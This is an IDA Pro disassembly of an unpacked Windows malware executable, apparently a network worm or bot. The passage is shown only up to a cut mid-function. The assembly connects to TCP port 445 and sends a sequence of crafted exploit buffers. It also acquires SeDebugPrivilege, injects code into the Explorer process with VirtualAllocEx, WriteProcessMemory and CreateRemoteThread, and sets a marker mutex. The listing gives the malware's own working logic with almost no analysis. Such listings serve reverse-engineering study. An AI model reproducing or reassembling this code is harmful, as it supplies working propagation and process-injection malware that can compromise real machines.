;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 673798DF403750BB1FAE55946CBAC9C3
; File Name : u:\work\673798df403750bb1fae55946cbac9c3_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31500000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31501000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31501000 dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31501004 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31501008 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_3150100C dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHash ; sub_315028AE+FD�r
dword_31501010 dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31501014 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31501018 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_3150101C dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKeydword_31501020 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31501024 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31501028 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3150102C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_315023E4+1D�r
dword_31501030 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31501034 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_315023E4+4E�r ...
dword_31501038 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownA align 10h
dword_31501040 dd 7C830D74h, 7C80D262h; resolved to->KERNEL32.lstrcmpA ; sub_31503722:loc_31503968�r ...
dword_31501048 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryA ; sub_315029C7+14B�r
dword_3150104C dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_31503608+ED�r
dword_31501050 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_31503371+A�r
dword_31501054 dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_31501058 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_3150105C dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31501060 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_31501064 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31501068 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_315029C7+3F�r ...
dword_3150106C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; UPX0:31503448�r ...
dword_31501070 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31501074 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31501078 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3150107C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31501080 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31501084 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31501088 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_315026C2+8F�r ...
dword_3150108C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA ; sub_31502BE8+98�r
dword_31501090 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_31502BE8+C2�r
dword_31501094 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_315025F6+F�r
dword_31501098 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_315028AE:loc_31502980�r ...
dword_3150109C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_315025F6+C3�r
dword_315010A0 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_315011C0+272�r ...
dword_315010A4 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31501A62+E2�r ...
dword_315010A8 dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_315029C7+69�r ...
dword_315010AC dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_315010B0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_315017AF+2C�r
dword_315010B4 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31501D96+EC�r
dword_315010B8 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_315010BC dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_31501911+19�r ...
dword_315010C0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_31502490+92�r
dword_315010C4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31501D1A�r
dword_315010C8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_315031EC+13�r ...
dword_315010CC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_315010D0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31501911+12�r ...
dword_315010D4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_315010D8 dd 7C80A017h ; resolved to->KERNEL32.SetEvent ; sub_31502B4C+1B�r
dword_315010DC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_315010E0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_31501BA8+66�r ...
dword_315010E4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_31502128+3F�r ...
dword_315010E8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_315010EC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_315010F0 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_315029C7+83�r ...
align 8
dword_315010F8 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_315010FC dd 77C4CBE0h ; resolved to->MSVCRT.atandword_31501100 dd 77C4D444h ; resolved to->MSVCRT.sindword_31501104 dd 77C4CD34h ; resolved to->MSVCRT.cos; ---------------------------------------------------------------------------
loc_31501108: ; DATA XREF: sub_31503A98�r
cmp [edi], ah
retn 0FA77h ; DATA XREF: UPX0:loc_31503A92�r
; ---------------------------------------------------------------------------
db 27h, 0C2h, 77h
dword_31501110 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31503722+B9�r
dword_31501114 dd 77C46030h ; resolved to->MSVCRT.strcpydword_31501118 dd 77C46040h ; resolved to->MSVCRT.strcat; ---------------------------------------------------------------------------
loc_3150111C: ; DATA XREF: UPX0:loc_31503A80�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31501120 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_31502490+79�r ...
dword_31501124 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31501BA8:loc_31501C76�r ...
dword_31501128 dd 77C371BCh ; resolved to->MSVCRT.srand ; sub_31503371+5D�r
dword_3150112C dd 77C46F70h ; resolved to->MSVCRT.memcpydword_31501130 dd 77C478A0h ; resolved to->MSVCRT.strlendword_31501134 dd 77C475F0h ; resolved to->MSVCRT.memset dd 0
dword_3150113C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31501A62+8B�r ...
dword_31501140 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31501144 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31501148 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId align 10h
dword_31501150 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlAdword_31501154 dd 42C2C8A1h ; resolved to->WININET.InternetOpenAdword_31501158 dd 42C2ABF4h ; resolved to->WININET.InternetReadFiledword_3150115C dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:31502307�r
dd 0
dword_31501164 dd 71AB2DC0h ; resolved to->WS2_32.selectdword_31501168 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_3150116C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31501170 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_31501F6B+7A�r ...
dword_31501174 dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_31501F6B+93�r ...
dword_31501178 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_31501F6B+B5�r ...
dword_3150117C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31501180 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31501184 dd 71AB2BF4h ; resolved to->WS2_32.inet_addrdword_31501188 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_315019F3+25�r
dword_3150118C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_31501BA8+AC�r ...
dword_31501190 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31502277+D�r
dword_31501194 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_31501BA8+F0�r ...
dword_31501198 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_31502DEC+46�r
dword_3150119C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31501A62+67�r ...
dword_315011A0 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_315011C0+1D8�r ...
dword_315011A4 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31501A62+128�r
dword_315011A8 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31501A62+12F�r ...
align 10h
dword_315011B0 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315011C0 proc near ; CODE XREF: sub_315020C4+36�p
; sub_31502128+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31503A50
mov eax, dword_315059CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_315059D0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_3150118C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31501720
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31501190 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_315010A8 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_315059C0
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31501233: ; CODE XREF: sub_315011C0+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31501233
push 60h
lea eax, [ebp+var_E4]
push offset dword_315054E0
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31503A44 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31503A3E ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31503A44 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31503A38 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31503A38 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31501194 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31501198 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31501716
mov esi, dword_315010A4
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_3150119C
push 89h
push offset dword_315052C8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A8h
push offset dword_31505354
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0DEh
push offset dword_31505400
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp eax, 46h
jl loc_3150170B
cmp [ebp+var_730], 31h
jnz loc_315015B6
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31503A38 ; memset
add esp, 0Ch
push offset byte_31505000
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_31505000
push eax
call sub_31503A44 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31503A44 ; memcpy
mov eax, dword_31505906
add esp, 0Ch
mov [ebp+var_798], eax
loc_31501457: ; CODE XREF: sub_315011C0+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 68h
push offset dword_31505544
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A0h
push offset dword_315055B0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp [ebp+arg_0], 0
jz loc_315016A6
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31505768
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31503A44 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_315057D4
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31503A44 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31505848
push eax
call sub_31503A44 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_315016FE
; ---------------------------------------------------------------------------
loc_315015B6: ; CODE XREF: sub_315011C0+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31503A38 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31505940
push eax
call sub_31503A44 ; memcpy
push offset byte_31505000
call sub_31503A3E ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_31505000
push eax
call sub_31503A44 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_315059B8
push eax
call sub_31503A44 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31505940
push eax
call sub_31503A44 ; memcpy
add esp, 40h
push offset byte_31505000
call sub_31503A3E ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_31505000
push eax
call sub_31503A44 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31501652: ; CODE XREF: sub_315011C0+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31501652
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31503A38 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31503A38 ; memset
add esp, 18h
jmp loc_31501457
; ---------------------------------------------------------------------------
loc_315016A6: ; CODE XREF: sub_315011C0+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31505654
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31503A44 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_315056D4
push eax
call sub_31503A44 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_315016FE: ; CODE XREF: sub_315011C0+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_3150170B: ; CODE XREF: sub_315011C0+1AD�j
; sub_315011C0+1E1�j ...
push 2
push [ebp+var_4]
call dword_315011A4 ; shutdown
loc_31501716: ; CODE XREF: sub_315011C0+166�j
push [ebp+var_4]
call dword_315011A8 ; closesocket
pop esi
loc_31501720: ; CODE XREF: sub_315011C0+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_315011C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501727 proc near ; CODE XREF: UPX0:loc_31501D5A�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_315010B4 ; LoadLibraryA
mov esi, dword_315010B0
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_315017AB
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_315017AB
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_315017AB
lea eax, [ebp+var_C]
push eax
push 20h
call dword_315010AC ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_315017AB: ; CODE XREF: sub_31501727+28�j
; sub_31501727+37�j ...
pop edi
pop esi
leave
retn
sub_31501727 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315017AF proc near ; CODE XREF: UPX0:31501D6E�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, ds:dword_31506190
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_315010C4 ; GetModuleHandleA
mov esi, dword_315010B0
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_315017F6
loc_315017F2: ; CODE XREF: sub_315017AF+54�j
push 1
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_315017F6: ; CODE XREF: sub_315017AF+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_315017F2
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31501144 ; FindWindowA
test eax, eax
jnz short loc_31501824
call dword_31501140 ; GetForegroundWindow
test eax, eax
jnz short loc_31501824
push 2
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_31501824: ; CODE XREF: sub_315017AF+65�j
; sub_315017AF+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31501148 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_315010C0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_3150184A
push 3
loc_31501847: ; CODE XREF: sub_315017AF+45�j
; sub_315017AF+73�j
pop eax
jmp short loc_315018B5
; ---------------------------------------------------------------------------
loc_3150184A: ; CODE XREF: sub_315017AF+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_315010BC
test eax, eax
jz short loc_315018A8
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_315010B8 ; WriteProcessMemory
push ds:dword_31506164
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31501894
push eax
call esi ; CloseHandle
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_31501894: ; CODE XREF: sub_315017AF+DE�j
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov [ebp+var_4], 5
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_315018A8: ; CODE XREF: sub_315017AF+B2�j
mov [ebp+var_4], 4
loc_315018AF: ; CODE XREF: sub_315017AF+E3�j
; sub_315017AF+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_315018B5: ; CODE XREF: sub_315017AF+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_315017AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018BA proc near ; CODE XREF: sub_31501BA8+B�p
; UPX0:31501D30�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_315010C8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31501128 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_315018BA endp
; =============== S U B R O U T I N E =======================================
sub_315018E8 proc near ; CODE XREF: sub_315017AF+EA�p
; UPX0:31501D3A�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_315010CC ; CreateMutexA
retn
sub_315018E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018F7 proc near ; CODE XREF: sub_31501D96+145�p
; sub_31501D96+150�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
pop ebp
retn
sub_315018F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501911 proc near ; CODE XREF: sub_31501BA8+12C�p
; sub_31501D96+12B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
push eax
call dword_315010BC ; CloseHandle
pop ebp
retn
sub_31501911 endp
; =============== S U B R O U T I N E =======================================
sub_31501932 proc near ; CODE XREF: sub_31501F6B+26�p
; sub_315025F6+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_3150195A
loc_31501943: ; CODE XREF: sub_31501932+26�j
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31501943
loc_3150195A: ; CODE XREF: sub_31501932+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31501932 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501962 proc near ; CODE XREF: sub_315029C7+16B�p
; sub_31503608+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31503A38 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_315010D4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_315010BC
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31501962 endp
; =============== S U B R O U T I N E =======================================
sub_315019B8 proc near ; CODE XREF: sub_31502DEC+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31501184 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_315019D5
test esi, esi
jnz short loc_315019E7
cmp byte ptr [edi], 30h
jz short loc_315019EE
loc_315019D5: ; CODE XREF: sub_315019B8+12�j
push edi
call dword_31501188 ; gethostbyname
test eax, eax
jz short loc_315019E7
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_315019E7: ; CODE XREF: sub_315019B8+16�j
; sub_315019B8+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_315019EE
xor esi, esi
loc_315019EE: ; CODE XREF: sub_315019B8+1B�j
; sub_315019B8+32�j
mov eax, esi
pop edi
pop esi
retn
sub_315019B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315019F3 proc near ; CODE XREF: sub_315021B0+3E�p
; sub_31502277+7�p
var_34 = byte ptr -34h
push ebp
